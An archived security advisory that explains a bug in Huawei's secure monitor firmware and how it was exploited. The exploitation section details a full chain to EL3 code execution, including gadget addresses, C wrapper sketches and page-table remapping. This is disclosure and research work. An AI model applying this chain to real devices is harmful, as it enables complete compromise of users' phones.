⚠️ [ ORIGIN SOURCE ]

https://blog.impalabs.com/2212_advisory_huawei-secure-monitor.html

📅 [ Archival Date ]

Dec 15, 2022 6:58 PM

🏷️ [ Tags ]

Android, Huawei, ATF, Secure Monitor

✍️ [ Author ]

Alexandre Adamski, Maxime Peterlin

In a previous blog post about the internals of Huawei's security hypervisor, we detailed the motivations of Android vendors for introducing new technologies to enhance the security of their devices. We explained that security hypervisors can watch over the Android kernel by leveraging the virtualization extensions of the ARMv8-A architecture. In particular, these extensions introduce EL2, an exception level more privileged than the kernel at EL1, and userland at EL0.

The ARM TrustZone is another one of these security features. It consists of a system-wide and hardware-enforced separation. All software and hardware is partitioned into an untrusted Normal World, and a trusted Secure World. Since non-secure software is prohibited from accessing secure resources, all communications between the two worlds need to go through a dedicated component, the Secure Monitor, that can be called into using the Secure Monitor Call (SMC) instruction.

The Secure Monitor runs at EL3, the new highest privilege level introduced with TrustZone. It has complete control over the device and is the only component allowed to perform certain privileged operations, in particular:

it manages critical peripherals, such as the cryptographic engine, the electronic fuses, and the RPMB partition;
it acts as a bridge between the normal and secure worlds, where it forwards requests between the Android kernel and the trusted OS.

Similarly to Samsung, Huawei chose to base their Secure Monitor implementation on the ARM Trusted Firmware (ATF), an open source reference implementation provided by ARM. Third-party features can be easily integrated into ATF through its EL3 runtime services framework, which was used by Huawei to implement additional groups of SMC handlers. During our security assessment, we focused primarily on these custom SMC handlers, as they have been under less scrutiny than their open source counterparts.

While we could have dwelled on the subject of runtime services, the explanations given by Fernand Lone Sang in his "Reverse Engineering Samsung S6 SBOOT" blog post are still relevant. We invite the reader to read the Service Descriptors section of part I and the Runtime services initialization section of part II.

The rest of this article describes two vulnerabilities we found in Huawei's Secure Monitor implementation.

SMC SE Factory Check OOB Access

Vulnerability Details

The Secure Element (SE), called HISEE, is a critical peripheral of Hisilicon-equipped devices. As such, it is only made accessible to the secure world, so the secure monitor needs to act as some kind of passthrough to let the kernel interact with it.

On the kernel side, most of the communications are performed by the "hisee" driver found in drivers/hisi/hisee/hisee.c using the HISEE_FN_MAIN_SERVICE_CMD SMC (0xC5000020). This SMC defines multiple commands, which correspond to the se_smc_cmd enumeration below.

▸ drivers/hisi/hisee/hisee.h

enum se_smc_cmd {
    // ...
    CMD_WRITE_RPMB_KEY,
    CMD_SET_LCS_SM,
    CMD_SET_STATE,
    CMD_GET_STATE,
    CMD_APDU_RAWDATA,
    CMD_FACTORY_APDU_TEST,
    CMD_HISEE_CHANNEL_TEST,
    CMD_HISEE_VERIFY_KEY,
    CMD_HISEE_WRITE_CASD_KEY,
    // ...
};

These commands are sent to the secure monitor using the send_smc_process function.

▸ drivers/hisi/hisee/hisee.c

int send_smc_process(const struct atf_message_header *p_message_header,
             phys_addr_t phy_addr, unsigned int size,
             unsigned int timeout, enum se_smc_cmd smc_cmd)
{
    // ...
    ret = atfd_hisee_smc((u64)HISEE_FN_MAIN_SERVICE_CMD,
                     (u64)smc_cmd, (u64)phy_addr, (u64)size);
    // ...
}

As an example, let's see how raw APDU commands are sent by the kernel using the write_apdu_command_func function. If the shared memory buffer of size 4096 bytes hasn't been allocated yet, this function allocates it by calling dma_alloc_coherent. It then sets the fields of the 16-byte atf_message_header structure located at the beginning of this shared buffer and finally copies the APDU command bytes right after it.

▸ drivers/hisi/hisee/hisee.c

static int write_apdu_command_func(const char *apdu_buf, unsigned int apdu_len)
{
    // ...
    if (!hisee_data_ptr->apdu_command_buff_virt)
        hisee_data_ptr->apdu_command_buff_virt =
            (void *)dma_alloc_coherent(hisee_data_ptr->cma_device,
                           SIZE_4K,
                           &hisee_data_ptr->apdu_command_buff_phy,
                           GFP_KERNEL);
    // ...
    p_message_header = (struct atf_message_header *)(uintptr_t)hisee_data_ptr->apdu_command_buff_virt;
    set_message_header(p_message_header, CMD_APDU_RAWDATA);
    // ...
    apdu_len = (apdu_len > HISEE_APDU_DATA_LEN_MAX) ?
           HISEE_APDU_DATA_LEN_MAX : apdu_len;
    ret = memcpy_s(hisee_data_ptr->apdu_command_buff_virt + HISEE_ATF_MESSAGE_HEADER_LEN,
               SIZE_4K - HISEE_ATF_MESSAGE_HEADER_LEN,
               (void *)apdu_buf, (size_t)apdu_len);
    // ...
    image_size = HISEE_ATF_MESSAGE_HEADER_LEN + apdu_len;
    p_message_header->test_result_phy =
        (u32)(hisee_data_ptr->apdu_command_buff_phy + SIZE_2K);
    p_message_header->test_result_size = (unsigned int)SIZE_1K;
    ret = send_smc_process(p_message_header,
                   hisee_data_ptr->apdu_command_buff_phy, image_size,
                   HISEE_ATF_GENERAL_TIMEOUT, CMD_APDU_RAWDATA);
    // ...
    ret = memcpy_s(hisee_data_ptr->apdu_ack.ack_buf,
               HISEE_APDU_DATA_LEN_MAX + 1,
               (hisee_data_ptr->apdu_command_buff_virt + SIZE_2K),
               (size_t)p_message_header->test_result_size);
    // ...
    hisee_data_ptr->apdu_ack.ack_len = p_message_header->test_result_size;
    // ...
}

The header structure atf_message_header contains the command of the HISEE_FN_MAIN_SERVICE_CMD SMC, a return code, and the physical address and size of the buffer where the response data should be copied by the secure monitor. In write_apdu_command_func, we can see that the response data, at most 1024 bytes, should be copied into the shared buffer itself at offset 2048.

▸ drivers/hisi/hisee/hisee.h

/* message header between kernel and atf */
struct atf_message_header {
    /*
     * atf cmd execute type, such as otp, cos, sloader at all,
     * kernel set and atf read it
     */
    unsigned int cmd;
    /*
     * atf cmd execute result indication, use a magic value to
     * indicate success, atf set it and check in kernel
     */
    unsigned int ack;
    /* tell atf store the result to this buffer when doing channel test */
    unsigned int test_result_phy;
    /* tell atf the size of buffer when doing channel test */
    unsigned int test_result_size;
};

On the secure monitor side, the HISEE_FN_MAIN_SERVICE_CMD SMC is handled by the hisee_smc_handler function. If the command uses a shared memory buffer as an argument, like the CMD_APDU_RAWDATA command invoked by write_apdu_command_func, its physical address and size should be checked by the se_smc_addr_check function before it is dispatched to the actual handler.

uintptr_t hisee_smc_handler(
        uint32_t smc_fid,
        uint64_t x1,
        uint64_t x2,
        uint64_t x3,
        uint64_t x4,
        void *cookie,
        void *handle,
        uint64_t flags) {
    // Do the arguments (shared memory buffer address and size) need to be checked?
    if (x1 - 0xb > 0x35 || ((1ULL << (x1 - 0xb)) & 0x2003e000002041) == 0) {
        // Ensure the shared memory buffer is in the CMA region.
        if (!se_smc_addr_check(x2, x3)) {
            debug_print("\nse smc addr error\n");
            goto ERROR;
        }
        // Ensure it is at least as large as the header structure.
        if (x3 < 0x10) {
            debug_print("\nse smc size error\n");
            goto ERROR;
        }
    }
    // Find the corresponding command handler and call it.
    for (i = 0; i != 25; ++i) {
        if (x1 == se_smc_cmd_handlers[i].cmd) {
            handler_t handler = se_smc_cmd_handlers[i].handler;
            if (handler)
                return handler(x1, x2, x3, handle);
        }
    }
    debug_print("\n%s: unknown cmd %x\n", "hisee_smc_handler", x1);
}

The se_smc_addr_check function ensures the shared memory buffer is located, in its entirety, in the CMA region (0x40000000-0x50000000). As we have just seen, it is called from hisee_smc_handler, but it can also be called directly from the SMC handlers when needed.

uint64_t se_smc_addr_check(uint64_t addr, uint64_t size) {
    // Retrieve (once) the CMA region base address and size.
    if (!cma_info_read) {
        if (get_cma_info(&g_cma_addr, &g_cma_size)) {
            debug_print("\nget cma info fail\n\r");
            return 0;
        }
        cma_info_read = 1;
    }

    // Ensure address and address+size are within this region.
    if (g_cma_addr <= addr && addr <= addr + size)
        return addr + size <= g_cma_addr + g_cma_size;
    return 0;
}

The commands whose arguments are not checked, and whose handlers should therefore never use them, are listed below:

ID	Name
0x0B	CMD_GET_STATE
0x11	CMD_HISEE_FACTORY_CHECK
0x18	-
0x30	CMD_HISEE_POWER_ON
0x31	CMD_HISEE_POWER_OFF
0x32	CMD_SMX_PROCESS_STEP1
0x33	CMD_SMX_PROCESS_STEP2
0x34	CMD_SMX_GET_EFUSE
0x40	CMD_HISEE_GET_EFUSE_VALUE
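The exemption test in hisee_smc_handler is a range check followed by a bitmask lookup. As a sanity check on the table above, the minimal sketch below re-implements that condition and enumerates the IDs that skip se_smc_addr_check. The helper names is_unchecked_cmd and list_unchecked_cmds are ours and do not appear in the firmware; only the constants come from the decompiled listing.

```c
#include <assert.h>
#include <stdint.h>

/* Bitmask taken from the decompiled hisee_smc_handler listing. */
#define SE_UNCHECKED_MASK 0x2003e000002041ULL

/* Returns 1 if the command ID skips the address and size checks.
 * Hypothetical helper; the logic mirrors the handler's condition. */
static int is_unchecked_cmd(uint64_t cmd)
{
    uint64_t bit = cmd - 0xb;   /* wraps to a huge value when cmd < 0xb */

    if (bit > 0x35)
        return 0;
    return (int)((SE_UNCHECKED_MASK >> bit) & 1);
}

/* Fills ids[] with every unchecked command ID below 0x100 and
 * returns how many were found. */
static int list_unchecked_cmds(uint64_t *ids, int max)
{
    int n = 0;

    for (uint64_t cmd = 0; cmd < 0x100; cmd++) {
        if (is_unchecked_cmd(cmd)) {
            assert(n < max);
            ids[n++] = cmd;
        }
    }
    return n;
}
```

Calling list_unchecked_cmds with a 16-entry array yields the nine IDs of the table, from 0x0B up to 0x40.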

However, when looking at se_factory_check, the command handler for CMD_HISEE_FACTORY_CHECK, we noticed that it uses its arguments. This is evidenced by the shared memory buffer address and size being given to the set_message_header function.

uintptr_t se_factory_check(uint64_t cmd, uint64_t addr, uint64_t size, void *handle) {
    int32_t ret;
    char request[32];

    if (addr) {
        memset_s(request, sizeof(request), 0, sizeof(request));
        set_message_header(addr, size);
        *(uint32_t *)(request + 0x00) = 0xd7;
        *(uint32_t *)(request + 0x04) = 0;
        *(uint32_t *)(request + 0x08) = 0x13d8;
        *(uint32_t *)(request + 0x0c) = 0;
        *(uint32_t *)(request + 0x10) = 0x13d8;
        *(uint64_t *)(request + 0x18) = 0x1422bbc0;
        ret = se_cmd_mailbox_send(request);
    }
    // ...
}

set_message_header saves the address and size of the shared memory buffer into global variables that will be used later.

void set_message_header(uint64_t addr, uint64_t size) {
    g_msg_hdr_addr = addr;
    g_msg_hdr_size = size;
}

Because of the missing call to se_smc_addr_check for CMD_HISEE_FACTORY_CHECK, the kernel can pass addr and size values so that the shared buffer is outside of the CMA region. In particular, it can pass addresses that are within the secure monitor's address space.

We now need to find where these values are used to determine what an attacker can do with them. By looking at the cross references to g_msg_hdr_addr, we found the code path taken when handling the SE's reply to a request. When the SE has handled the request, the secure monitor receives a reply in its mailbox and calls the corresponding handler, which is se_chip_test_ack for CMD_HISEE_FACTORY_CHECK.

se_chip_test_ack then calls send_ack, with the response code and 0xC bytes of response data.

uint64_t se_chip_test_ack(char* reply) {
    uint32_t code;
    uint32_t data[3];

    if (reply) {
        // Copy the response data into a local buffer.
        data[0] = *(uint32_t *)(reply + 0x4);
        data[1] = *(uint32_t *)(reply + 0xc);
        data[2] = *(uint32_t *)(reply + 0x10);
        // Convert the status word into a response code.
        if (reply[1] == 0xa3) {
            code = 0xccaa;
        } else {
            debug_print("\nhisee test result %x %x %x!\n",
                data[0], data[1], data[2]);
            code = 0xcc55;
        }
        // Send the response and its data to the kernel.
        send_ack(code | 0xaabb0000, data, 0xc);
        return 0;
    } else {
        debug_print("\n%s: para error!\n", "se_chip_test_ack");
        return 0xFFFFFFFF;
    }
}

send_ack does the following:

it sets the ack field of the header to the response code;
it sets its test_result_size field to MIN(g_msg_hdr_size, data_size);
it copies the response data (if any) to test_result_phy, provided that the kernel-provided buffer passes se_smc_addr_check.

void send_ack(uint32_t code, uint64_t data_addr, uint32_t data_size)
{
    struct atf_message_header *message_header;
    uint32_t resp_buf;
    uint32_t resp_buf_len;

    // Get the shared memory buffer saved in g_msg_hdr_addr.
    message_header = (struct atf_message_header*)g_msg_hdr_addr;
    if (g_msg_hdr_addr) {
        // Set the return code.
        message_header->ack = code;
        // Get the response buffer's address and size.
        resp_buf = message_header->test_result_phy;
        resp_buf_len = MIN(g_msg_hdr_size, data_size);
        message_header->test_result_size = resp_buf_len;
        // If there is any response data, copy it to the response buffer,
        // provided that buffer passes se_smc_addr_check.
        if (data_addr && resp_buf && se_smc_addr_check(resp_buf, resp_buf_len)
                && memcpy_s(resp_buf, resp_buf_len, data_addr, resp_buf_len)) {
            debug_print("\n%s: memcpy err\n", "send_ack");
        } else {
            arm_gic_raise_softirq(8);
        }
    } else {
        debug_print("\n%s: null pointer err\n", "send_ack");
    }
}

So if we set g_msg_hdr_addr to an address X within the secure monitor's address space, it will write code (0xAABBCC55) at X+0x4 and data_size (a value always between 0x0 and 0xC in the calling functions) at X+0xC.
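To make the two side-effect writes concrete, here is a minimal host-side model of what send_ack stores through g_msg_hdr_addr before any address check takes place. It only reuses the atf_message_header layout from the kernel header; the function model_send_ack_stores and the byte array standing in for monitor memory are illustrative assumptions.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Header layout from drivers/hisi/hisee/hisee.h. */
struct atf_message_header {
    uint32_t cmd;
    uint32_t ack;               /* offset 0x4 */
    uint32_t test_result_phy;
    uint32_t test_result_size;  /* offset 0xc */
};

/* Models the two unchecked stores of send_ack. `mem` stands in for the
 * monitor's memory and `x` is the offset chosen as header address.
 * Hypothetical helper, not firmware code. */
static void model_send_ack_stores(uint8_t *mem, size_t x, uint32_t code,
                                  uint32_t hdr_size, uint32_t data_size)
{
    uint32_t len = hdr_size < data_size ? hdr_size : data_size;

    assert(mem != NULL);
    /* message_header->ack = code; */
    memcpy(mem + x + offsetof(struct atf_message_header, ack),
           &code, sizeof(code));
    /* message_header->test_result_size = MIN(g_msg_hdr_size, data_size); */
    memcpy(mem + x + offsetof(struct atf_message_header, test_result_size),
           &len, sizeof(len));
}
```

In this model, overwriting a 32-bit value at target T with the response code means choosing X = T - 0x4, while overwriting it with the data size means choosing X = T - 0xC. Each trigger performs both stores, so the second location must also be harmless to clobber.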

We'll see in the exploitation section how this bug can be used to craft an exploit achieving reliable code execution in EL3 from NS-EL1.

Exploitation

In this section, we will describe the exploit and the different primitives we constructed to get arbitrary code execution in EL3 from the kernel.

Disabling the CMA Whitelist

The first step of the exploit is to disable the CMA whitelist so that the calls to se_smc_addr_check always return true. This way, in send_ack, we will be able to reach the call to memcpy_s with a controlled destination address.

We do that by triggering the vulnerability twice, once to change g_cma_addr to 0xC (using the data_size value) and a second time to change g_cma_size to 0xAABBCC55 (using the code value). This will transform the allowed address range from 0x40000000-0x50000000 to 0xC-0xAABBCC61, making it possible to use addresses in the secure monitor's address space as destinations for memcpy_s.
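The effect of these two overwrites can be checked with a small model of the range test in se_smc_addr_check. The sketch below takes the CMA base and size as parameters instead of reading g_cma_addr and g_cma_size; the function names are ours, and the target address is simply the handler pointer discussed later in this article.

```c
#include <assert.h>
#include <stdint.h>

/* Model of the range test in se_smc_addr_check, with the CMA base and
 * size passed explicitly. Hypothetical helper, not firmware code. */
static int model_addr_check(uint64_t cma_addr, uint64_t cma_size,
                            uint64_t addr, uint64_t size)
{
    if (cma_addr <= addr && addr <= addr + size)
        return addr + size <= cma_addr + cma_size;
    return 0;
}

/* Usage example: a monitor address is rejected by the original
 * whitelist and accepted once both globals have been overwritten. */
static void cma_whitelist_example(void)
{
    const uint64_t target = 0x14230238ULL;

    assert(!model_addr_check(0x40000000ULL, 0x10000000ULL, target, 1));
    assert(model_addr_check(0xcULL, 0xaabbcc55ULL, target, 1));
}
```

The upper bound of the patched range is 0xC + 0xAABBCC55 = 0xAABBCC61, which comfortably covers the monitor's address space.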

Hijacking an SMC Handler Pointer

By using CMD_HISEE_FACTORY_CHECK a third time, the response data coming from the SE will be copied to the destination address of our choice:

7c 02 10 0b 57 57 57 13 b6 01 00 00

Furthermore, it is possible to make memcpy_s copy less than 0xC bytes by setting g_msg_hdr_size to a smaller value than data_size. Please note that it is not possible to do that directly with the command arguments because of the size < 0x10 check in hisee_smc_handler. In our exploit, we set g_msg_hdr_size to 1, so that only the first byte (0x7c) gets written at our arbitrary location.

This primitive is then used to hijack one of the many function pointers present in the data section to get control of the secure monitor's execution flow. The idea is to find a function pointer that is easily reachable from an SMC and that will point to an interesting gadget once we change its value. This is highly dependent on the secure monitor's version. For reference, on our test device it was v1.5(debug):ab5a980.

We chose to modify one of the SMC handler pointers of the bl31_secap_svc runtime service.

ops_t bl31_secap_smc_handlers[] = {
    /* 0x14230238: */ {0xca000001, func_14204a1c},
    /* 0x14230248: */ {0xca000002, func_14204a14},
    /* 0x14230258: */ {0xca000008, func_14205144},
};

The SMC handler pointer we targeted is located at address 0x14230238 and points to the function at 0x14204A1C. The reason we chose this one in particular is that there is an interesting BLR X2 gadget at 0x14204A7C that lets us call an arbitrary function:

0x14204a7c:  ldr  x2, [x2,#0xb8]
0x14204a80:  cbnz x2, loc_14204aa0
...
0x14204aa0:  blr  x2

Note: The value we will branch to comes from dereferencing X2+0xB8, so we will need to have X2 pointing to some memory that is readable from the secure monitor and preferably, that we can control from the kernel. For example, we can reuse the shared memory buffer for this.
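The single-byte overwrite works because pointers are stored in little-endian order on this target, so the first byte in memory is the least significant one. The sketch below models a truncated copy of the SE response over a stored pointer; overwrite_low_bytes is a hypothetical helper that keeps the pointer as an explicit byte array so that the result does not depend on the host's endianness.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Overwrites the first `n` bytes of a little-endian 64-bit pointer with
 * bytes from the SE response, as a truncated memcpy_s would do. */
static uint64_t overwrite_low_bytes(uint64_t ptr, const uint8_t *resp, size_t n)
{
    uint8_t raw[8];
    uint64_t out = 0;

    assert(n <= sizeof(raw));
    for (int i = 0; i < 8; i++)
        raw[i] = (uint8_t)(ptr >> (8 * i));   /* little-endian image */
    memcpy(raw, resp, n);
    for (int i = 0; i < 8; i++)
        out |= (uint64_t)raw[i] << (8 * i);
    return out;
}
```

With the response bytes quoted above and n = 1, the handler pointer 0x14204A1C becomes 0x14204A7C, the address of the BLR X2 gadget.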

Let's now detail how we can leverage this gadget to build better primitives.

The function pointer we hijacked is used in bl31_secap_handler (0x14205150), which is just a wrapper for the SMC handlers in bl31_secap_smc_handlers. The arguments passed from NS-EL1, except for smc_fid, will be moved into X0-X3 at the call site.

0x14205264:  mov x2, x3
0x14205268:  mov x0, x22
0x1420526c:  mov x1, x21
0x14205270:  mov x3, x4
0x14205274:  blr x6        /* address of the blr x2 gadget */

Looking at the assembly calling the handler (now our BLR X2 gadget), we can see that we control the following registers:

X0 == X22
X1 == X21
X2
X3 == X4

X2 must point to memory that holds, at offset 0xB8, the address of the second gadget we will jump to from the BLR X2 gadget. Now we just need to find an interesting gadget that uses any of the other registers we control to enhance our current primitives.

We'll start by finding an arbitrary write gadget.

Temporary Write Primitive

In a code base as large as the monitor, it's not too hard to find a gadget that writes a value from a register to an address. However, we need to take into account the fact that the branch at the call site of the original SMC handler is a BLR instruction, which means we will lose the original return address in the LR register. Nonetheless, we can retrieve the return address stored in the bl31_secap_handler's stack frame by finding a gadget with the same epilogue (or at least the same stack frame size). This way, we can return cleanly to the runtime service dispatcher.

The epilogue of bl31_secap_handler below restores the saved registers and releases its 0x50-byte stack frame before returning:

0x1420528c:  ldp x19, x20, [sp,#0x10]
0x14205290:  ldp x21, x22, [sp,#0x20]
0x14205294:  ldp x29, x30, [sp],#0x50
0x14205298:  ret

The arbitrary write gadget we're using, found at address 0x1420CF88, does the same thing and will therefore return properly:

0x1420cf88:  str   w1, [x0]
0x1420cf8c:  csinc w0, w21, wzr, ne
0x1420cf90:  ldp   x19, x20, [sp,#0x10]
0x1420cf94:  ldp   x21, x22, [sp,#0x20]
0x1420cf98:  ldp   x23, x24, [sp,#0x30]
0x1420cf9c:  ldp   x29, x30, [sp],#0x50
0x1420cfa0:  ret

Once the SMC handler pointer has been replaced with the address of our BLR X2 gadget, we can call the corresponding SMC from the kernel with the following arguments and start using our arbitrary write:

X0: the hijacked SMC ID (0xCA000001);
X1: the address we want to write to;
X2: the value we want to write;
X3: a buffer containing, at offset 0xB8, the address of the arbitrary write gadget.
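The register flow of this temporary primitive can be modeled on the host as follows. This is only a sketch: the mapping of X22 and X21 to the SMC's X1 and X2 is inferred from the argument list above, and place_gadget, model_hijacked_call and struct gadget_regs are names we introduce for illustration.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define GADGET_SLOT 0xb8   /* offset read by `ldr x2, [x2,#0xb8]` */

/* Stores the address of the second-stage gadget where the BLR X2 gadget
 * will load it from. `buf` stands in for the kernel's shared buffer. */
static void place_gadget(uint8_t *buf, uint64_t gadget_addr)
{
    /* `cbnz x2` only reaches the `blr x2` for a non-zero target. */
    assert(gadget_addr != 0);
    memcpy(buf + GADGET_SLOT, &gadget_addr, sizeof(gadget_addr));
}

/* Registers as seen by the second-stage gadget. */
struct gadget_regs {
    uint64_t x0;
    uint64_t x1;
    uint64_t branch_target;
};

/* Applies the moves at the bl31_secap_handler call site, then the load
 * performed by the BLR X2 gadget. */
static struct gadget_regs model_hijacked_call(uint64_t smc_x1, uint64_t smc_x2,
                                              const uint8_t *smc_x3_buf)
{
    struct gadget_regs r;

    r.x0 = smc_x1;                           /* mov x0, x22 */
    r.x1 = smc_x2;                           /* mov x1, x21 */
    memcpy(&r.branch_target,                 /* mov x2, x3 */
           smc_x3_buf + GADGET_SLOT,         /* ldr x2, [x2,#0xb8] */
           sizeof(r.branch_target));
    return r;
}
```

Since the write gadget executes `str w1, [x0]`, the value placed in the SMC's X2 ends up written, as a 32-bit store, to the address placed in the SMC's X1.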

Stable Read/Write Primitives

The next step of the exploit is to get better read/write primitives by modifying, yet again, the SMC handler pointers of bl31_secap_svc.

The handler pointer for SMC 0xCA000001 (at address 0x14230238) is changed to 0x14205E74, which is an arbitrary write gadget:

0x14205e74:  str x0, [x1]
0x14205e78:  ret

The handler pointer for SMC 0xCA000002 (at address 0x14230248) is changed to 0x142013F4, which is an arbitrary read gadget:

0x142013f4:  ldr w0, [x0,x1]
0x142013f8:  ret

At this stage, we have stable read/write primitives, and we can now start working towards arbitrary code execution.
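From the kernel's point of view, these two gadgets can be wrapped as sketched below. Several things are assumptions here: the smc_fn callback type is a hypothetical stand-in for whatever routine issues the SMC, we assume the same call-site register moves apply to both handlers, and we assume the gadget's W0 is handed back to the kernel in X0. The mock_smc function is a host-side test double, not monitor code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical callback that issues an SMC and returns X0. */
typedef uint64_t (*smc_fn)(uint64_t fid, uint64_t x1, uint64_t x2, uint64_t x3);

#define SMC_EL3_WRITE 0xca000001u   /* handler replaced by `str x0, [x1]` */
#define SMC_EL3_READ  0xca000002u   /* handler replaced by `ldr w0, [x0,x1]` */

static void el3_write64(smc_fn smc, uint64_t addr, uint64_t value)
{
    smc(SMC_EL3_WRITE, value, addr, 0);   /* gadget: x0 = value, x1 = addr */
}

static uint32_t el3_read32(smc_fn smc, uint64_t addr)
{
    return (uint32_t)smc(SMC_EL3_READ, addr, 0, 0);   /* x0 = base, x1 = 0 */
}

static uint64_t el3_read64(smc_fn smc, uint64_t addr)
{
    uint64_t lo = el3_read32(smc, addr);
    uint64_t hi = el3_read32(smc, addr + 4);

    return lo | (hi << 32);
}

/* Host-side stand-in for the patched monitor, used to exercise the
 * wrappers. Memory is kept little-endian like the real target. */
#define FAKE_BASE 0x14230000ULL
static uint8_t fake_el3[64];

static uint64_t mock_smc(uint64_t fid, uint64_t x1, uint64_t x2, uint64_t x3)
{
    (void)x3;
    if (fid == SMC_EL3_WRITE) {           /* str x0, [x1] */
        assert(x2 >= FAKE_BASE && x2 - FAKE_BASE + 8 <= sizeof(fake_el3));
        for (size_t i = 0; i < 8; i++)
            fake_el3[x2 - FAKE_BASE + i] = (uint8_t)(x1 >> (8 * i));
        return x1;
    }
    if (fid == SMC_EL3_READ) {            /* ldr w0, [x0,x1] */
        uint64_t off = x1 + x2 - FAKE_BASE;
        uint32_t w = 0;

        assert(x1 + x2 >= FAKE_BASE && off + 4 <= sizeof(fake_el3));
        for (size_t i = 0; i < 4; i++)
            w |= (uint32_t)fake_el3[off + i] << (8 * i);
        return w;
    }
    return ~0ULL;
}
```

Note that the argument order differs from the temporary primitive: the stable write gadget stores X0 at the address in X1, so the value goes first and the address second.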

Double Mapping the Secure Monitor

To get code execution in the secure monitor, our objective is to patch the code of an SMC handler. However, since the code section is mapped as read-only, we cannot do that directly. To bypass the WXN mechanism, we decided to target the page table and map the secure monitor a second time, as read-write. This way, we are able to change the secure monitor's code from the writable mapping and have the changes mirrored in the executable one.

The first step of this phase is to find the third-level EL3 page table corresponding to the monitor's code and data sections. We do so by looking for the descriptors of the secure monitor based on the physical addresses that they map (i.e. we know that the monitor's physical address range starts at 0x14200000). A dump of the corresponding descriptors in the page tables is given below.

/* monitor code section */
0x14251000: c3 07 20 14 00 00 00 00 c3 17 20 14 00 00 00 00 .. ....... .....
0x14251010: c3 27 20 14 00 00 00 00 c3 37 20 14 00 00 00 00 .' ......7 .....
0x14251020: c3 47 20 14 00 00 00 00 c3 57 20 14 00 00 00 00 .G ......W .....
[...]
0x14251150: c3 a7 22 14 00 00 00 00 c3 b7 22 14 00 00 00 00 ..".......".....
0x14251160: c3 c7 22 14 00 00 00 00 c3 d7 22 14 00 00 00 00 ..".......".....
0x14251170: c3 e7 22 14 00 00 00 00 c3 f7 22 14 00 00 00 00 ..".......".....

/* monitor data + rodata section */
0x14251180: 43 07 23 14 00 00 40 00 43 17 23 14 00 00 40 00 C.#...@.C.#...@.
0x14251190: 43 27 23 14 00 00 40 00 43 37 23 14 00 00 40 00 C'#...@.C7#...@.
0x142511a0: 43 47 23 14 00 00 40 00 43 57 23 14 00 00 40 00 CG#...@.CW#...@.
[...]
0x14251310: 43 27 26 14 00 00 40 00 43 37 26 14 00 00 40 00 C'&...@.C7&...@.
0x14251320: 43 47 26 14 00 00 40 00 43 57 26 14 00 00 40 00 CG&...@.CW&...@.
0x14251330: 43 67 26 14 00 00 40 00 47 76 26 14 00 00 40 00 Cg&...@.Gv&...@.

/* unused descriptors */
0x14251340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x14251350: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x14251360: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[...]
0x142516d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x142516e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0x142516f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

As can be seen above, there are multiple unused descriptors right after the monitor's. The double mapping can be achieved by copying the monitor's descriptors to this unused space, changing their AP field to read/write, and setting their PXN flag. This way, we'll have a read-write mapping of the monitor starting from virtual address 0x14268000. We can now patch the monitor code however we like.
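The address of the alias and the descriptor changes can be derived from the dump. In the sketch below, the table and mapping bases come from the dump itself, while the two attribute bits are read off by comparing the code descriptors (0x...7c3) with the data descriptors (0x0040...743): they differ in bit 7 and in bit 54, the execute-never bit. The macro and function names are ours, and the bit positions should be treated as an assumption about this particular table.

```c
#include <assert.h>
#include <stdint.h>

#define TABLE_BASE   0x14251000ULL   /* level-3 table address from the dump */
#define MAPPED_BASE  0x14200000ULL   /* VA mapped by the first descriptor */
#define PAGE_SIZE_4K 0x1000ULL
#define DESC_AP_RO   (1ULL << 7)     /* set in the read-only code descriptors */
#define DESC_XN      (1ULL << 54)    /* set in the data descriptors */

/* Virtual address mapped by the 8-byte descriptor stored at desc_addr. */
static uint64_t desc_to_va(uint64_t desc_addr)
{
    return MAPPED_BASE + (desc_addr - TABLE_BASE) / 8 * PAGE_SIZE_4K;
}

/* Turns a read-only, executable page descriptor into a writable,
 * non-executable one that maps the same physical page. */
static uint64_t make_rw_alias(uint64_t desc)
{
    return (desc & ~DESC_AP_RO) | DESC_XN;
}

/* Usage example based on the values visible in the dump. */
static void double_mapping_example(void)
{
    /* First unused slot, so the alias starts at 0x14268000. */
    assert(desc_to_va(0x14251340ULL) == 0x14268000ULL);
    /* First code descriptor, rewritten with data-like attributes. */
    assert(make_rw_alias(0x00000000142007c3ULL) == 0x0040000014200743ULL);
}
```

Writing the transformed descriptors with the stable write primitive, starting at 0x14251340, is what produces the second mapping at 0x14268000.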

Getting Code Execution in EL3

The last thing left to do is modify another SMC handler pointer to execute a shellcode we placed somewhere in memory. In our exploit, we chose to change the last handler pointer (for the SMC 0xCA000008) in bl31_secap_smc_handlers to 0x14200000 and then write our shellcode at the corresponding double-mapped address. At this point, we have everything required to hijack the secure monitor and get code execution at EL3.

Exploitation Summary

Step 0: The initial state where the whitelist is still effective. It prevents the kernel from passing a buffer located outside of the CMA region, except for the vulnerable CMD_HISEE_FACTORY_CHECK command.

Step 1: We trigger the vulnerability twice to set g_cma_addr to 0xC and to set g_cma_size to 0xAABBCC55. This disables the CMA whitelist, including for the response data buffer used by send_ack.

Step 2: We can make the memcpy_s call write bytes of the response data to an arbitrary address. We look for a function pointer that can be made to point to an interesting gadget, such as an arbitrary function call.

Step 3: We trigger the vulnerability a third time: the first byte of the response data is written to the LSB of the SMC handler pointer, making it point to our arbitrary call gadget. We look for a temporary write gadget.

Step 4: We put the address of the arbitrary write gadget in memory pointed to by register x2 and invoke the hijacked SMC. This executes the arbitrary call gadget, which in turn calls the arbitrary write gadget.

Step 5: When invoking the hijacked SMC, we set the other registers so that the address of the arbitrary write gadget is written to the SMC handler pointer. The arbitrary write gadget can now be called directly.

Step 6: We invoke the twice-hijacked SMC to write the address of a read gadget to another SMC handler pointer. We now have stable read/write primitives that can be used to get code execution.

Step 7: We use the read primitive to locate the EL3 page tables. In one of the pages, we find the descriptor that maps the virtual address 0x14200000, the base address of the secure monitor.

Step 8: Because of the WXN mechanism, we can't directly make the code section writable. Instead we create a second mapping of the physical memory by copying the descriptors that map the code and data sections.

